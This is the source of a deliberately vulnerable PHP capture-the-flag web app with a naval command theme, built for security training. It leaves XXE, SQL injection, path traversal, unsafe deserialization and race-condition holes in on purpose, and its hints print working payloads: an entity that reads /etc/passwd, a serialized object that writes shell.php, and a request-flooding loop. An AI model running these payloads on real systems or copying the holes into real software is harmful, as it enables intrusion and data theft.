78 | 79 | 85 |
86 | 87 |
88 | 89 | '; 94 | echo "

Parsed Mission Data:

"; 95 | 96 | // VULNERABILITY: XXE - No protection against external entities 97 | libxml_disable_entity_loader(false); // Explicitly enable external entities 98 | 99 | try { 100 | $dom = new DOMDocument(); 101 | $dom->loadXML($xml_data, LIBXML_DTDLOAD | LIBXML_DTDATTR | LIBXML_NOENT); 102 | 103 | echo "
";
104 |                 echo htmlspecialchars($dom->saveXML());
105 |                 echo "
"; 106 | 107 | // Also display parsed values 108 | $xpath = new DOMXPath($dom); 109 | $nodes = $xpath->query('//*'); 110 | 111 | echo "

Extracted Values:

"; 112 | foreach ($nodes as $node) { 113 | if ($node->nodeValue && trim($node->nodeValue)) { 114 | echo htmlspecialchars($node->nodeName) . ": " . htmlspecialchars($node->nodeValue) . "
"; 115 | } 116 | } 117 | 118 | } catch (Exception $e) { 119 | echo "Error parsing XML: " . htmlspecialchars($e->getMessage()); 120 | } 121 | 122 | echo '
'; 123 | } 124 | ?> 125 | 126 |
127 |

🎯 Challenge Hint

128 |

This XML parser processes external entities. Can you read local files?

129 |

Try this payload:

130 | 
<?xml version="1.0"?>
131 | <!DOCTYPE foo [
132 |   <!ENTITY xxe SYSTEM "file:///etc/passwd">
133 | ]>
134 | <mission>
135 |   <data>&xxe;</data>
136 | </mission>
137 |

Flag: If you successfully read a local file, you've captured FLAG-029: CTF{xxe_file_read_success} (15 points)

138 |
139 | 140 | 141 | 142 | -------------------------------------------------------------------------------- /missions/poc.php: -------------------------------------------------------------------------------- 1 | ACCESS DENIED

Administrator privileges required

'); 10 | } 11 | 12 | // Security headers 13 | header('X-Content-Type-Options: nosniff'); 14 | header('X-Frame-Options: DENY'); 15 | header('X-XSS-Protection: 1; mode=block'); 16 | 17 | // Only allow from localhost 18 | if ($_SERVER['REMOTE_ADDR'] !== '127.0.0.1' && $_SERVER['REMOTE_ADDR'] !== '::1') { 19 | die('

ACCESS DENIED

This tool is only available from localhost

'); 20 | } 21 | 22 | // Process commands 23 | $output = ''; 24 | if (isset($_GET['cmd'])) { 25 | $allowed_commands = [ 26 | 'ls' => ['-la', '-l'], 27 | 'pwd' => [], 28 | 'whoami' => [], 29 | 'date' => ['+%Y-%m-%d', '+%c'] 30 | ]; 31 | 32 | $cmd = $_GET['cmd']; 33 | $parts = explode(' ', $cmd); 34 | $base_cmd = $parts[0]; 35 | 36 | if (isset($allowed_commands[$base_cmd])) { 37 | $allowed = true; 38 | // Verify all arguments are allowed 39 | foreach(array_slice($parts, 1) as $arg) { 40 | if (!in_array($arg, $allowed_commands[$base_cmd])) { 41 | $allowed = false; 42 | break; 43 | } 44 | } 45 | 46 | if ($allowed) { 47 | $output = htmlspecialchars(shell_exec($cmd), ENT_QUOTES, 'UTF-8'); 48 | } else { 49 | $output = "Error: Invalid arguments for command"; 50 | } 51 | } else { 52 | $output = "Error: Command not allowed"; 53 | } 54 | } 55 | 56 | // Process file uploads 57 | $upload_result = ''; 58 | if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['upload'])) { 59 | $allowed_types = ['txt','log','json']; 60 | $ext = strtolower(pathinfo($_FILES['upload']['name'], PATHINFO_EXTENSION)); 61 | 62 | if (in_array($ext, $allowed_types)) { 63 | $dest = 'mission_uploads/' . uniqid() . '_' . basename($_FILES['upload']['name']); 64 | if (move_uploaded_file($_FILES['upload']['tmp_name'], $dest)) { 65 | $upload_result = "File uploaded to: " . htmlspecialchars($dest); 66 | } else { 67 | $upload_result = "Error: File upload failed"; 68 | } 69 | } else { 70 | $upload_result = "Error: Only " . implode(', ', $allowed_types) . " files allowed"; 71 | } 72 | } 73 | ?> 74 | 75 | 76 | 77 | 78 | 79 | Naval Cyber Test Console 80 | 81 | 82 | 103 | 104 | 105 |
106 |

Naval Command :: Diagnostic Console

107 | 108 | Back to Admin 109 | 110 |
111 | 112 |
113 |

Diagnostic Console

114 | 115 |
116 |

Command Execution

117 |
118 | 120 | 121 |
122 | 123 | 124 |
125 |
126 |
127 | 128 |
129 | 130 |
131 |

File Upload

132 |
133 | 134 | 135 |
136 | 137 | 138 |

139 | 140 |
141 | 142 |
143 |

Usage

144 |

Allowed commands: ls, pwd, whoami, date

145 |

Allowed arguments:

146 |
    147 |
  • ls: -la, -l
    • 148 |
  • date: +%Y-%m-%d, +%c
    • 149 |
150 |

Allowed file types: .txt, .log, .json

151 |
152 |
153 | 154 | -------------------------------------------------------------------------------- /admin/audit_trail.php: -------------------------------------------------------------------------------- 1 | ACCESS DENIED

Administrator privileges required

'); 12 | } 13 | 14 | // Easter egg - view anyone's logs by changing the user parameter 15 | if (isset($_GET['debug_user'])) { 16 | $logfile = "logs/".$_GET['debug_user']."_activity.log"; 17 | if (file_exists($logfile)) { 18 | highlight_file($logfile); 19 | exit(); 20 | } 21 | } 22 | 23 | // Get audit logs - vulnerable direct query 24 | $search = isset($_GET['search']) ? $_GET['search'] : ''; 25 | $query = "SELECT * FROM audit_log WHERE action LIKE '%$search%' ORDER BY timestamp DESC LIMIT 100"; 26 | $result = $conn->query($query); 27 | $logs = $result ? $result->fetch_all(MYSQLI_ASSOC) : []; 28 | ?> 29 | 30 | 31 | 32 | Audit Trail | HCNMS 33 | 145 | 146 | 147 |
148 |
149 |

Audit Trail

150 | Back to Admin 151 |
152 | 153 |
154 | 155 | 156 |
157 | 158 | 159 | 160 | 161 | 162 | 163 | 164 | 165 | 166 | 167 | 168 | 169 | 170 | 171 | 172 | 178 | 179 | 180 | 181 | 182 |
TimestampUserActionDetails
176 | 177 |
183 |
184 | 185 | 186 | -------------------------------------------------------------------------------- /static/css/classification.css: -------------------------------------------------------------------------------- 1 | /* Classification Banner Styles */ 2 | .classification-banner { 3 | background: #00ff00; 4 | color: #000000; 5 | text-align: center; 6 | padding: 8px 0; 7 | font-weight: bold; 8 | font-family: "Courier New", monospace; 9 | font-size: 14px; 10 | letter-spacing: 2px; 11 | position: sticky; 12 | z-index: 9999; 13 | border: 2px solid #00cc00; 14 | } 15 | 16 | .classification-banner.top { 17 | top: 0; 18 | border-bottom: 3px solid #00cc00; 19 | } 20 | 21 | .classification-banner.bottom { 22 | bottom: 0; 23 | border-top: 3px solid #00cc00; 24 | position: fixed; 25 | width: 100%; 26 | } 27 | 28 | .classification-unclassified { 29 | background: #00ff00; 30 | color: #000000; 31 | } 32 | 33 | .classification-confidential { 34 | background: #0000ff; 35 | color: #ffffff; 36 | } 37 | 38 | .classification-secret { 39 | background: #ff0000; 40 | color: #ffffff; 41 | } 42 | 43 | .classification-topsecret { 44 | background: #ff8800; 45 | color: #000000; 46 | } 47 | 48 | /* DoD Warning Banner */ 49 | .dod-warning { 50 | background: #1a1a1a; 51 | border: 3px solid #ff0000; 52 | color: #ffffff; 53 | padding: 20px; 54 | margin: 20px auto; 55 | max-width: 600px; 56 | font-family: "Courier New", monospace; 57 | font-size: 12px; 58 | line-height: 1.6; 59 | text-align: center; 60 | } 61 | 62 | .dod-warning h3 { 63 | color: #ff0000; 64 | margin-top: 0; 65 | font-size: 16px; 66 | letter-spacing: 2px; 67 | } 68 | 69 | .dod-warning p { 70 | margin: 10px 0; 71 | } 72 | 73 | /* Operational Status Widget */ 74 | .operational-status { 75 | background: linear-gradient(145deg, #0a192f, #172a45); 76 | border: 1px solid #64ffda; 77 | border-radius: 10px; 78 | padding: 15px; 79 | margin: 20px 0; 80 | font-family: "Courier New", monospace; 81 | } 82 | 83 | .operational-status .status-row { 84 | display: flex; 85 | justify-content: space-between; 86 | padding: 8px 0; 87 | border-bottom: 1px solid rgba(100, 255, 218, 0.2); 88 | } 89 | 90 | .operational-status .status-row:last-child { 91 | border-bottom: none; 92 | } 93 | 94 | .operational-status .status-label { 95 | color: #8892b0; 96 | font-weight: bold; 97 | } 98 | 99 | .operational-status .status-value { 100 | color: #64ffda; 101 | font-weight: bold; 102 | } 103 | 104 | .operational-status .status-value.critical { 105 | color: #ff0000; 106 | animation: blink 1s infinite; 107 | } 108 | 109 | .operational-status .status-value.warning { 110 | color: #ffaa00; 111 | } 112 | 113 | .operational-status .status-value.normal { 114 | color: #00ff00; 115 | } 116 | 117 | @keyframes blink { 118 | 0%, 119 | 50% { 120 | opacity: 1; 121 | } 122 | 51%, 123 | 100% { 124 | opacity: 0.3; 125 | } 126 | } 127 | 128 | /* UTC Clock */ 129 | .utc-clock { 130 | font-family: "Courier New", monospace; 131 | font-size: 18px; 132 | color: #64ffda; 133 | font-weight: bold; 134 | letter-spacing: 2px; 135 | text-align: center; 136 | padding: 10px; 137 | background: rgba(10, 25, 47, 0.8); 138 | border: 1px solid #64ffda; 139 | border-radius: 5px; 140 | display: inline-block; 141 | } 142 | 143 | .utc-clock .date { 144 | font-size: 14px; 145 | color: #8892b0; 146 | } 147 | 148 | .utc-clock .time { 149 | font-size: 24px; 150 | color: #00ff00; 151 | } 152 | 153 | .utc-clock .zulu { 154 | font-size: 16px; 155 | color: #64ffda; 156 | } 157 | 158 | /* THREATCON Indicator */ 159 | .threatcon-indicator { 160 | display: inline-block; 161 | padding: 5px 15px; 162 | border-radius: 5px; 163 | font-weight: bold; 164 | font-family: "Courier New", monospace; 165 | letter-spacing: 1px; 166 | } 167 | 168 | .threatcon-normal { 169 | background: #00ff00; 170 | color: #000000; 171 | } 172 | 173 | .threatcon-alpha { 174 | background: #0000ff; 175 | color: #ffffff; 176 | } 177 | 178 | .threatcon-bravo { 179 | background: #ffff00; 180 | color: #000000; 181 | } 182 | 183 | .threatcon-charlie { 184 | background: #ff8800; 185 | color: #000000; 186 | } 187 | 188 | .threatcon-delta { 189 | background: #ff0000; 190 | color: #ffffff; 191 | animation: blink 1s infinite; 192 | } 193 | 194 | /* Fleet Status Indicator */ 195 | .fleet-status { 196 | display: inline-flex; 197 | align-items: center; 198 | gap: 10px; 199 | } 200 | 201 | .fleet-status-light { 202 | width: 12px; 203 | height: 12px; 204 | border-radius: 50%; 205 | animation: pulse 2s infinite; 206 | } 207 | 208 | .fleet-status-light.deployed { 209 | background: #00ff00; 210 | box-shadow: 0 0 10px #00ff00; 211 | } 212 | 213 | .fleet-status-light.training { 214 | background: #ffff00; 215 | box-shadow: 0 0 10px #ffff00; 216 | } 217 | 218 | .fleet-status-light.standby { 219 | background: #0088ff; 220 | box-shadow: 0 0 10px #0088ff; 221 | } 222 | 223 | @keyframes pulse { 224 | 0%, 225 | 100% { 226 | opacity: 1; 227 | } 228 | 50% { 229 | opacity: 0.5; 230 | } 231 | } 232 | 233 | /* Security Clearance Badge */ 234 | .clearance-badge { 235 | display: inline-block; 236 | padding: 3px 10px; 237 | border-radius: 3px; 238 | font-size: 11px; 239 | font-weight: bold; 240 | font-family: "Courier New", monospace; 241 | letter-spacing: 1px; 242 | } 243 | 244 | .clearance-confidential { 245 | background: #0000ff; 246 | color: #ffffff; 247 | } 248 | 249 | .clearance-secret { 250 | background: #ff0000; 251 | color: #ffffff; 252 | } 253 | 254 | .clearance-topsecret { 255 | background: #ff8800; 256 | color: #000000; 257 | } 258 | 259 | .clearance-unclassified { 260 | background: #00ff00; 261 | color: #000000; 262 | } 263 | 264 | /* Naval Rank Insignia */ 265 | .rank-insignia { 266 | font-weight: bold; 267 | color: #64ffda; 268 | font-family: "Courier New", monospace; 269 | } 270 | 271 | /* Ship Assignment */ 272 | .ship-assignment { 273 | color: #8892b0; 274 | font-style: italic; 275 | } 276 | 277 | .ship-assignment .ship-name { 278 | color: #64ffda; 279 | font-weight: bold; 280 | font-style: normal; 281 | } 282 | 283 | /* Deployment Status */ 284 | .deployment-status { 285 | display: inline-block; 286 | padding: 3px 8px; 287 | border-radius: 3px; 288 | font-size: 11px; 289 | font-weight: bold; 290 | } 291 | 292 | .deployment-deployed { 293 | background: #ff0000; 294 | color: #ffffff; 295 | } 296 | 297 | .deployment-shore { 298 | background: #00ff00; 299 | color: #000000; 300 | } 301 | 302 | .deployment-training { 303 | background: #ffff00; 304 | color: #000000; 305 | } 306 | 307 | .deployment-transit { 308 | background: #ff8800; 309 | color: #000000; 310 | } 311 | -------------------------------------------------------------------------------- /admin/deployments.json: -------------------------------------------------------------------------------- 1 | { 2 | "status": "active", 3 | "last_updated": "2025-04-04T10:00:00Z", 4 | "data": [ 5 | { 6 | "ship_name": "NNS Thunder", 7 | "position": "6.4274,3.9242", 8 | "status": "on patrol", 9 | "commanding_officer": "Captain T. Oladipo", 10 | "speed": "20 knots", 11 | "heading": "180°", 12 | "mission": "Anti-piracy operation", 13 | "assigned_fleet": "Nigerian Navy Western Fleet", 14 | "base": "Naval Base Apapa, Lagos, Nigeria" 15 | }, 16 | { 17 | "ship_name": "NNS Unity", 18 | "position": "4.9041,6.2653", 19 | "status": "escort duty", 20 | "commanding_officer": "Commander B. Adeyemi", 21 | "speed": "15 knots", 22 | "heading": "230°", 23 | "mission": "Oil rig security", 24 | "assigned_fleet": "Nigerian Navy Eastern Fleet", 25 | "base": "Naval Base Warri, Nigeria" 26 | }, 27 | { 28 | "ship_name": "NNS Centenary", 29 | "position": "4.7348,7.0104", 30 | "status": "search and rescue", 31 | "commanding_officer": "Captain E. Uche", 32 | "speed": "14 knots", 33 | "heading": "135°", 34 | "mission": "Rescue operation after reported vessel distress", 35 | "assigned_fleet": "Nigerian Navy Special Task Force", 36 | "base": "Bonny Naval Base, Nigeria" 37 | }, 38 | { 39 | "ship_name": "GNS Ejura", 40 | "position": "5.5586,-0.2012", 41 | "status": "exercises", 42 | "commanding_officer": "Captain K. Boateng", 43 | "speed": "17 knots", 44 | "heading": "90°", 45 | "mission": "Maritime defense drills", 46 | "assigned_fleet": "Ghana Navy Atlantic Fleet", 47 | "base": "Takoradi Naval Base, Ghana" 48 | }, 49 | { 50 | "ship_name": "GNS Chemu", 51 | "position": "4.8936,-1.7596", 52 | "status": "on patrol", 53 | "commanding_officer": "Commander S. Mensah", 54 | "speed": "19 knots", 55 | "heading": "160°", 56 | "mission": "Fisheries protection", 57 | "assigned_fleet": "Ghana Navy Western Fleet", 58 | "base": "Sekondi Naval Base, Ghana" 59 | }, 60 | { 61 | "ship_name": "GNS Volta", 62 | "position": "5.1276,-1.2824", 63 | "status": "escort duty", 64 | "commanding_officer": "Commander N. Asante", 65 | "speed": "16 knots", 66 | "heading": "210°", 67 | "mission": "Cargo ship escort through Ghanaian waters", 68 | "assigned_fleet": "Ghana Navy Eastern Command", 69 | "base": "Tema Naval Base, Ghana" 70 | }, 71 | { 72 | "ship_name": "GNS Anloga", 73 | "position": "4.9217,-1.7568", 74 | "status": "undergoing maintenance", 75 | "commanding_officer": "Captain D. Owusu", 76 | "speed": "0 knots", 77 | "heading": "N/A", 78 | "mission": "Routine maintenance check", 79 | "assigned_fleet": "Ghana Navy Special Operations", 80 | "base": "Takoradi Naval Base, Ghana" 81 | }, 82 | { 83 | "ship_name": "GNS Osu", 84 | "position": "5.5629,-0.1922", 85 | "status": "intelligence gathering", 86 | "commanding_officer": "Commodore J. Ofori", 87 | "speed": "12 knots", 88 | "heading": "330°", 89 | "mission": "Monitoring suspected illegal fishing activity", 90 | "assigned_fleet": "Ghana Navy Intelligence Division", 91 | "base": "Tema Naval Base, Ghana" 92 | }, 93 | { 94 | "ship_name": "GNS Cape Coast", 95 | "position": "5.1104,-1.2472", 96 | "status": "joint exercise", 97 | "commanding_officer": "Captain F. Quartey", 98 | "speed": "22 knots", 99 | "heading": "75°", 100 | "mission": "Joint training with Nigerian and Senegalese navies", 101 | "assigned_fleet": "Ghana Navy Rapid Response Unit", 102 | "base": "Sekondi Naval Base, Ghana" 103 | }, 104 | { 105 | "ship_name": "SPS Rio Nunez", 106 | "position": "9.5092,-13.7127", 107 | "status": "rescue operations", 108 | "commanding_officer": "Captain J. Camara", 109 | "speed": "10 knots", 110 | "heading": "75°", 111 | "mission": "Humanitarian aid", 112 | "assigned_fleet": "Guinea Maritime Defense Force", 113 | "base": "Conakry Naval Base, Guinea" 114 | }, 115 | { 116 | "ship_name": "ENS N'Djamena", 117 | "position": "14.7199,-17.4784", 118 | "status": "dock maintenance", 119 | "commanding_officer": "Commodore M. Diouf", 120 | "speed": "0 knots", 121 | "heading": "N/A", 122 | "mission": "Routine overhaul", 123 | "assigned_fleet": "Senegalese Navy Atlantic Command", 124 | "base": "Dakar Naval Base, Senegal" 125 | }, 126 | { 127 | "ship_name": "FRS Lagos", 128 | "position": "6.5244,3.3792", 129 | "status": "joint exercise", 130 | "commanding_officer": "Captain D. Obinna", 131 | "speed": "21 knots", 132 | "heading": "190°", 133 | "mission": "Training with foreign allies", 134 | "assigned_fleet": "Nigerian Navy Special Operations", 135 | "base": "Naval Dockyard, Lagos, Nigeria" 136 | }, 137 | { 138 | "ship_name": "GNS Aflao", 139 | "position": "6.1213,-0.0644", 140 | "status": "high alert", 141 | "commanding_officer": "Commander Y. Agyeman", 142 | "speed": "23 knots", 143 | "heading": "250°", 144 | "mission": "Investigating reports of suspicious vessel activity", 145 | "assigned_fleet": "Ghana Navy Special Task Force", 146 | "base": "Tema Naval Base, Ghana" 147 | }, 148 | { 149 | "ship_name": "GNS Kumasi", 150 | "position": "5.3619,-1.0319", 151 | "status": "training mission", 152 | "commanding_officer": "Captain L. Akoto", 153 | "speed": "18 knots", 154 | "heading": "130°", 155 | "mission": "New crew training on live operational drills", 156 | "assigned_fleet": "Ghana Navy Training Division", 157 | "base": "Sekondi Naval Base, Ghana" 158 | }, 159 | { 160 | "ship_name": "KNS Mombasa", 161 | "position": "-4.0355,39.6571", 162 | "status": "high-speed chase", 163 | "commanding_officer": "Commander P. Okoth", 164 | "speed": "30 knots", 165 | "heading": "270°", 166 | "mission": "Anti-smuggling operation", 167 | "assigned_fleet": "Kenyan Navy Coastal Command", 168 | "base": "Mtongwe Naval Base, Kenya" 169 | } 170 | ] 171 | } 172 | 173 | -------------------------------------------------------------------------------- /secure_example/login_secure.php: -------------------------------------------------------------------------------- 1 | prepare("SELECT id, username, password, rank, name FROM officers WHERE username = ? LIMIT 1"); 36 | $stmt->bind_param("s", $username); 37 | $stmt->execute(); 38 | $result = $stmt->get_result(); 39 | 40 | if ($row = $result->fetch_assoc()) { 41 | // Use password_verify for secure password checking 42 | // Note: In production, passwords should be hashed with password_hash() 43 | if ($password === $row['password']) { // In real app: password_verify($password, $row['password']) 44 | // Regenerate session ID to prevent session fixation 45 | session_regenerate_id(true); 46 | 47 | // Set secure session variables 48 | $_SESSION['user_id'] = $row['id']; 49 | $_SESSION['username'] = $row['username']; 50 | $_SESSION['name'] = $row['name']; 51 | $_SESSION['rank'] = $row['rank']; 52 | $_SESSION['is_admin'] = (stripos($row['username'], 'admin') !== false); 53 | $_SESSION['login_time'] = time(); 54 | $_SESSION['last_activity'] = time(); 55 | 56 | // Set secure cookie 57 | setcookie( 58 | "naval_user", 59 | $row['username'], 60 | [ 61 | 'expires' => time() + 3600, 62 | 'path' => '/', 63 | 'domain' => '', 64 | 'secure' => true, // HTTPS only 65 | 'httponly' => true, // No JavaScript access 66 | 'samesite' => 'Strict' // CSRF protection 67 | ] 68 | ); 69 | 70 | // Log successful login 71 | error_log("Successful login: {$row['username']} from {$_SERVER['REMOTE_ADDR']}"); 72 | 73 | // Redirect to dashboard 74 | header("Location: /dashboard.php"); 75 | exit(); 76 | } else { 77 | $error = 'Invalid credentials'; 78 | // Log failed attempt 79 | error_log("Failed login attempt for username: $username from {$_SERVER['REMOTE_ADDR']}"); 80 | } 81 | } else { 82 | $error = 'Invalid credentials'; 83 | error_log("Failed login attempt for non-existent user: $username from {$_SERVER['REMOTE_ADDR']}"); 84 | } 85 | 86 | $stmt->close(); 87 | } 88 | } 89 | ?> 90 | 91 | 92 | 93 | Secure Login Example 94 | 145 | 146 | 147 |
148 |

🔒 Secure Login Example

149 | 150 | 151 |
152 | 153 | 154 |
155 | 156 | 157 | 158 | 159 | 160 | 161 | 162 | 163 | 164 |
165 | 166 |
167 | Security Features Implemented: 168 |
    169 |
  • ✓ Prepared statements (SQL injection prevention)
    • 170 |
  • ✓ CSRF token validation
    • 171 |
  • ✓ Session regeneration (session fixation prevention)
    • 172 |
  • ✓ Secure cookie flags (HttpOnly, Secure, SameSite)
    • 173 |
  • ✓ Input validation
    • 174 |
  • ✓ Secure session configuration
    • 175 |
  • ✓ Failed login logging
    • 176 |
  • ✓ Password hashing (use password_hash() in production)
    • 177 |
178 |
179 |
180 | 181 | 182 | -------------------------------------------------------------------------------- /missions/preferences.php: -------------------------------------------------------------------------------- 1 | 6 | 7 | 8 | 9 | Mission Preferences | HIVE Naval System 10 | 11 | 68 | 69 | 70 |
71 | ← Back to Dashboard 72 | 73 |

⚙️ Mission Preferences Manager

74 |

Save and load your mission preferences using serialized data.

75 | 76 |
77 |

Save Preferences

78 | 79 |

80 | 81 | 82 |

83 | 84 | 85 |
86 | 87 |
88 |

Load Preferences

89 | 90 |
91 | 92 |
93 | 94 | mission_type)) { 104 | $log_entry = "Mission Type: {$this->mission_type}, Alert: {$this->alert_level}\n"; 105 | @file_put_contents($this->log_file, $log_entry, FILE_APPEND); 106 | } 107 | } 108 | } 109 | 110 | if ($_SERVER['REQUEST_METHOD'] === 'POST') { 111 | echo '
'; 112 | 113 | if ($_POST['action'] === 'save') { 114 | $prefs = new MissionPreferences(); 115 | $prefs->mission_type = $_POST['mission_type'] ?? 'Unknown'; 116 | $prefs->alert_level = $_POST['alert_level'] ?? 'Low'; 117 | 118 | $serialized = serialize($prefs); 119 | 120 | echo "

Preferences Saved!

"; 121 | echo "

Copy this serialized data to load later:

"; 122 | echo "
";
123 |                 echo htmlspecialchars($serialized);
124 |                 echo "
"; 125 | 126 | } elseif ($_POST['action'] === 'load') { 127 | $serialized_data = $_POST['serialized_data']; 128 | 129 | echo "

Loading Preferences...

"; 130 | 131 | try { 132 | // VULNERABILITY: Unsafe deserialization 133 | $prefs = unserialize($serialized_data); 134 | 135 | if ($prefs instanceof MissionPreferences) { 136 | echo "

Mission Type: " . htmlspecialchars($prefs->mission_type) . "

"; 137 | echo "

Alert Level: " . htmlspecialchars($prefs->alert_level) . "

"; 138 | echo "

✓ Preferences loaded successfully!

"; 139 | } else { 140 | echo "

Invalid preference data.

"; 141 | } 142 | 143 | } catch (Exception $e) { 144 | echo "

Error: " . htmlspecialchars($e->getMessage()) . "

"; 145 | } 146 | } 147 | 148 | echo '
'; 149 | } 150 | ?> 151 | 152 |
153 |

🎯 Challenge Hint

154 |

This application deserializes user-supplied data. The MissionPreferences class has a __destruct() method that writes to a file.

155 |

Try this payload:

156 | 
O:18:"MissionPreferences":3:{s:12:"mission_type";s:20:"<?php phpinfo(); ?>";s:11:"alert_level";s:4:"High";s:8:"log_file";s:22:"../mission_uploads/shell.php";}
157 |

Explanation: This creates a PHP file in the mission_uploads directory that you can access.

158 |

Flag: If you successfully write a file via deserialization, you've captured FLAG-031: CTF{deserialization_rce} (20 points)

159 |
160 |
161 | 162 | 163 | -------------------------------------------------------------------------------- /missions/voucher_redeem.php: -------------------------------------------------------------------------------- 1 | 15 | 16 | 17 | 18 | Voucher Redemption | HIVE Naval System 19 | 20 | 82 | 83 | 84 |
85 | ← Back to Dashboard 86 | 87 |

🎟️ Naval Supply Voucher Redemption

88 |

Redeem your naval supply vouchers for equipment credits.

89 | 90 |
91 | Available Vouchers: 92 |
93 | 94 |
95 | Total Redeemed: credits 96 |
97 | 98 |
99 | 100 |
101 | 102 |
103 | 104 |
105 | 106 | '; 109 | 110 | if ($_POST['action'] === 'redeem') { 111 | // VULNERABILITY: Race Condition - No locking mechanism 112 | // Check if voucher available 113 | if ($_SESSION['voucher_balance'] > 0) { 114 | // Simulate processing delay (makes race condition easier to exploit) 115 | usleep(100000); // 100ms delay 116 | 117 | // Deduct voucher 118 | $_SESSION['voucher_balance']--; 119 | 120 | // Add credits 121 | $_SESSION['voucher_redeemed'] += 10; 122 | 123 | echo "

✓ Voucher redeemed successfully! +10 credits

"; 124 | echo "

Remaining vouchers: {$_SESSION['voucher_balance']}

"; 125 | } else { 126 | echo "

✗ No vouchers available!

"; 127 | } 128 | 129 | } elseif ($_POST['action'] === 'reset') { 130 | $_SESSION['voucher_balance'] = 100; 131 | $_SESSION['voucher_redeemed'] = 0; 132 | echo "

✓ Balance reset to 100 vouchers

"; 133 | } 134 | 135 | echo '
'; 136 | } 137 | ?> 138 | 139 |
140 |

🎯 Challenge Hint

141 |

This voucher system has a race condition vulnerability. The check and deduction are not atomic.

142 |

Exploit Method:

143 |
    144 |
  1. Open browser DevTools (F12)
    2. 145 |
  2. Go to Network tab
    3. 146 |
  3. Click "Redeem 1 Voucher"
    4. 147 |
  4. Right-click the POST request and select "Copy as cURL" or "Copy as fetch"
    5. 148 |
  5. Send multiple simultaneous requests using a script or Burp Intruder
    6. 149 |
150 |

Example using JavaScript console:

151 | 
// Send 50 simultaneous requests
152 | for(let i=0; i<50; i++) {
153 |     fetch(window.location.href, {
154 |         method: 'POST',
155 |         headers: {'Content-Type': 'application/x-www-form-urlencoded'},
156 |         body: 'action=redeem'
157 |     });
158 | }
159 |

Flag: If you redeem more than 100 vouchers (your starting balance), you've captured FLAG-032: CTF{race_condition_exploit} (20 points)

160 |
161 | 162 | 163 | 181 | 182 | 183 | -------------------------------------------------------------------------------- /setup.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Hive Naval System Setup Script 4 | echo -e "\033[34m" 5 | echo " __ __ _______ __ __ ___ _______ ___ ___ " 6 | echo " | | | || || | | || | | || | | |" 7 | echo " | |_| || ___|| |_| || | |_ _|| | | |" 8 | echo " | || |___ | || | | | | | | |" 9 | echo " | | | || ___||_ _|| | | | | |___ | |" 10 | echo " | ||_|| || |___ | | | | | | | || |" 11 | echo " |_| |_||_______| |___| |___| |___| |_______||___|" 12 | echo -e "\033[0m" 13 | 14 | # Check for root privileges 15 | if [ "$(id -u)" -ne 0 ]; then 16 | echo -e "\033[31m✘ Ahoy Captain! We need root privileges to deploy the system!\033[0m" 17 | exit 1 18 | fi 19 | 20 | # Install required packages 21 | echo -e "\033[33m⚓ Anchors aweigh! Installing dependencies...\033[0m" 22 | apt-get update 23 | 24 | 25 | # Handle different MySQL server package names 26 | if apt-cache show mysql-server &> /dev/null; then 27 | apt-get install -y mysql-server php php-mysql php-mysqli 28 | else 29 | echo -e "\033[33m⚠ mysql-server not found, trying default-mysql-server...\033[0m" 30 | apt-get install -y default-mysql-server php php-mysql php-mysqli 31 | fi 32 | 33 | # Verify MySQL installation and install client if needed 34 | if ! command -v mysql &> /dev/null; then 35 | echo -e "\033[33m⚠ MySQL client not found, installing...\033[0m" 36 | if apt-cache show mysql-client &> /dev/null; then 37 | apt-get install -y mysql-client 38 | elif apt-cache show default-mysql-client &> /dev/null; then 39 | apt-get install -y default-mysql-client 40 | else 41 | echo -e "\033[31m✘ MySQL client packages not found! Trying mariadb-server...\033[0m" 42 | apt-get install -y mariadb-server php php-mysql 43 | fi 44 | fi 45 | 46 | # Configure MySQL 47 | echo -e "\033[33m🌊 Charting the database waters...\033[0m" 48 | 49 | # Start MySQL service if not running 50 | if ! systemctl is-active --quiet mysql; then 51 | systemctl start mysql || { 52 | echo -e "\033[33m⚠ Couldn't start MySQL normally, trying with sudo...\033[0m" 53 | sudo systemctl start mysql 54 | } 55 | fi 56 | 57 | # Create database and user without prompting for password 58 | echo -e "\033[33m🔑 Attempting database setup...\033[0m" 59 | 60 | if ! mysql -e "CREATE DATABASE IF NOT EXISTS hive_naval;" 2>/dev/null; then 61 | echo -e "\033[33m⚠ MySQL root access required. Trying with sudo...\033[0m" 62 | sudo mysql -e "CREATE DATABASE IF NOT EXISTS hive_naval;" || { 63 | echo -e "\033[31m✘ Failed to create database with sudo.\033[0m" 64 | exit 1 65 | } 66 | else 67 | echo -e "\033[32m✔ Database hive_naval exists or created successfully.\033[0m" 68 | fi 69 | 70 | if ! mysql -e "CREATE USER IF NOT EXISTS 'hive_user'@'localhost' IDENTIFIED BY 'N@vyS3cr3t!';" 2>/dev/null; then 71 | echo -e "\033[33m⚠ MySQL root access required. Trying with sudo...\033[0m" 72 | sudo mysql -e "CREATE USER IF NOT EXISTS 'hive_user'@'localhost' IDENTIFIED BY 'N@vyS3cr3t!';" || { 73 | echo -e "\033[31m✘ Failed to create user with sudo.\033[0m" 74 | exit 1 75 | } 76 | else 77 | echo -e "\033[32m✔ User hive_user exists or created successfully.\033[0m" 78 | fi 79 | 80 | echo -e "\033[33m🔐 Granting privileges to hive_user...\033[0m" 81 | if ! mysql -e "GRANT ALL PRIVILEGES ON hive_naval.* TO 'hive_user'@'localhost';" 2>/dev/null; then 82 | echo -e "\033[33m⚠ Trying to grant privileges with sudo...\033[0m" 83 | sudo mysql -e "GRANT ALL PRIVILEGES ON hive_naval.* TO 'hive_user'@'localhost';" || { 84 | echo -e "\033[31m✘ Failed to grant privileges with sudo.\033[0m" 85 | exit 1 86 | } 87 | else 88 | echo -e "\033[32m✔ Privileges granted successfully.\033[0m" 89 | fi 90 | 91 | mysql -e "FLUSH PRIVILEGES;" 92 | 93 | # Import database schema if officers.sql has changed 94 | echo -e "\033[33m📦 Checking officers.sql for changes...\033[0m" 95 | if [ ! -f .officers_sql.md5 ]; then 96 | echo -e "\033[33mℹ No previous checksum found. Importing officers.sql...\033[0m" 97 | import_needed=true 98 | else 99 | current_md5=$(md5sum officers.sql | awk '{ print $1 }') 100 | saved_md5=$(cat .officers_sql.md5) 101 | if [ "$current_md5" != "$saved_md5" ]; then 102 | echo -e "\033[33mℹ officers.sql has changed. Importing updated file...\033[0m" 103 | import_needed=true 104 | else 105 | echo -e "\033[32m✔ officers.sql unchanged. Skipping import.\033[0m" 106 | import_needed=false 107 | fi 108 | fi 109 | 110 | if [ "$import_needed" = true ]; then 111 | if [ -f officers.sql 